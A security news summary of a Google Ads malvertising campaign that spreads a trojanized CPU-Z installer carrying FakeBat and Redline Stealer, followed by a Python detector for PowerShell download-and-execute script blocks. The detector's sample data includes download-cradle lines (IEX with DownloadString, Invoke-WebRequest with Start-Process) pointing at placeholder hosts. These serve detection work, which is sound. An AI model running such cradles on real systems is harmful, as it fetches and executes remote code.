November 9, 2023 at 11:15AM
A threat actor has been using Google Ads to distribute a trojanized version of the CPU-Z tool, delivering the Redline info-stealing malware. Malicious ads redirect victims to a cloned copy of a legitimate Windows news site, where they are prompted to download a digitally-signed CPU-Z installer. This installer contains a malicious PowerShell script that loads the FakeBat malware and fetches the Redline Stealer payload. Users should be cautious when clicking on promoted Google Search results and verify the legitimacy of websites before downloading software.
Summary:
A threat actor has been using Google Ads to distribute a trojanized version of the CPU-Z tool that delivers the Redline info-stealing malware. Malwarebytes analysts have identified this campaign as part of the same operation that previously used Notepad++ malvertising. The malicious Google advertisement leads to a cloned copy of the legitimate Windows news site WindowsReport: clicking the ad redirects users to the fake site, where they are prompted to download a digitally signed CPU-Z installer. The installer contains a malicious PowerShell script known as "FakeBat" that fetches the Redline Stealer payload from a remote URL and launches it on the victim's computer. Redline can steal passwords, cookies, browsing data, and sensitive information from cryptocurrency wallets. Users are advised to be cautious when clicking on promoted Google Search results and to verify that the loaded site and its domain match what they expect, or to use an ad-blocker that hides promoted results automatically.
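The loader stage described above (a PowerShell script that fetches a payload from a remote URL and launches it) is the kind of behaviour PowerShell script-block logging can surface. The following is an added detection example, not code from the article or from the Malwarebytes analysis: it scans constructed script-block records modelled on Windows Event ID 4104 and flags only blocks that both download remote content and execute something in the same block; the hostnames, scripts and URLs are made-up placeholders.

```python
import re
from dataclasses import dataclass, field

# Constructed sample records (host, script text) modelled on PowerShell
# script-block logging. They are not taken from the FakeBat sample the
# article describes; the URLs are placeholders.
SAMPLE_SCRIPT_BLOCKS = [
    ("host-01", "Get-ChildItem C:\\Users\\me\\Documents | Measure-Object"),
    ("host-02", "$u='http://example.invalid/p.bin';"
                "Invoke-WebRequest -Uri $u -OutFile $env:TEMP\\p.exe;"
                "Start-Process $env:TEMP\\p.exe"),
    ("host-03", "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"),
    # Download only, no execution: should not be flagged on its own.
    ("host-04", "Invoke-WebRequest -Uri https://updates.example.com/notes.txt -OutFile notes.txt"),
]

# Cmdlets and methods that pull content from a remote location.
DOWNLOAD = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Start-BitsTransfer", re.I)
# Constructs that run what was fetched (or anything else) in the same block.
EXECUTE = re.compile(r"Invoke-Expression|\bIEX\b|Start-Process|\.\s*Invoke\(", re.I)
URL = re.compile(r"https?://[^\s'\"]+", re.I)


@dataclass
class Finding:
    host: str
    urls: list = field(default_factory=list)
    reason: str = ""


def scan_script_block(host, script):
    """Return a Finding when a block both downloads and executes, which is the
    download-cradle pattern the FakeBat loader is described as using; a plain
    download or a plain execution alone is not enough to flag."""
    if DOWNLOAD.search(script) and EXECUTE.search(script):
        return Finding(host, URL.findall(script),
                       "download-and-execute in one script block")
    return None


def scan_all(records):
    """Scan every (host, script) record and collect the findings in order."""
    return [f for host, script in records
            if (f := scan_script_block(host, script)) is not None]


if __name__ == "__main__":
    for finding in scan_all(SAMPLE_SCRIPT_BLOCKS):
        print(finding.host, finding.reason, finding.urls)
```

The URLs collected from a flagged block are the values to check against the download-site domain seen in the malvertising chain, and against your proxy and DNS logs.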